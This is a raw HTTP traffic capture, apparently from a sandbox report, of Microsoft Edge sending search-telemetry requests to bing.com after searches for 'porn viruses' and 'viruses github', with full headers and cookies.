_RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 444
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163dc177d4894833421ac39dfb024
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-7qqKIdqYUeT2MbyZoXAKAqqwxNfebYozKESZJCswfXY='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:48 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144348.8b99abe
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviruses%20g%2Ci%3A21%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144346886%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20g%2Ci%3A20%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144346913%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20g%2Ci%3A20%22%2C%22AsResponseLength%22%3A%22462%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144347060%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20g%2Ci%3A20%2Cig%3AA08BBAE303D74EACBD5C8B8431B58506%22%2C%22AnswerInfo%22%3A%22LT%3B14%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144347060%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20gi%2Ci%3A22%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144347352%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20gi%2Ci%3A21%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144347385%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20gi%2Ci%3A21%22%2C%22AsResponseLength%22%3A%22444%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144347506%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20gi%2Ci%3A21%2Cig%3AACC4C3B51F2946CCA132A82824F773C3%22%2C%22AnswerInfo%22%3A%22LT%3B14%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144347506%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviruses%20g%2Ci%3A21%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144346886%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20g%2Ci%3A20%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144346913%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20g%2Ci%3A20%22%2C%22AsResponseLength%22%3A%22462%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144347060%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20g%2Ci%3A20%2Cig%3AA08BBAE303D74EACBD5C8B8431B58506%22%2C%22AnswerInfo%22%3A%22LT%3B14%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144347060%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20gi%2Ci%3A22%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144347352%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20gi%2Ci%3A21%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144347385%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20gi%2Ci%3A21%22%2C%22AsResponseLength%22%3A%22444%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144347506%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20gi%2Ci%3A21%2Cig%3AACC4C3B51F2946CCA132A82824F773C3%22%2C%22AnswerInfo%22%3A%22LT%3B14%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144347506%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144349.8b99d6b
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 441
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144349.8b9a524
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx? HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 371
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144350.8b9a70a
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144350030%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22250%22%2C%22Downlink%22%3A%226.2%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1728144350030%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1728144350322%2C%22Name%22%3A375%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350324%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350326%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144350030%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22250%22%2C%22Downlink%22%3A%226.2%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1728144350030%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1728144350322%2C%22Name%22%3A375%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350324%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350326%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144350.8b9ad57
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; 